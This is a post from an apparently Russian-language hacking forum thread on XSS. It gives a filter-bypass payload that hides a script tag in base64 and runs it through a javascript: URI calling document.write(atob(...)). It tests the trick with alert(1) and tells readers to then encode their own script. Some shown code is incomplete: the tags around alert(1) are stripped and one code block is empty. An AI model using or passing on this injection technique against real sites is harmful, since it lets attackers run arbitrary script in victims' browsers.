Тема: XSS [Mega Big Bug]
Показать сообщение отдельно

  #201  
Старый 20.01.2015, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию

для проверки кодируешь
source:

Код:
alert(1)

в бейс64
получится вот это -
source:

Код:
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg
==

вставляешь вместо своего javascript:alert() вот это -
source:

Код:
javascript:document.
write
(
atob
(
'PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='
))

если алерт сработал , то уже кодируешь свой скрипт в бейс64 типа
source:

Код:


вставляешь между кавычками после atob!
а вообще это один из множества вариантов!
 
Ответить с цитированием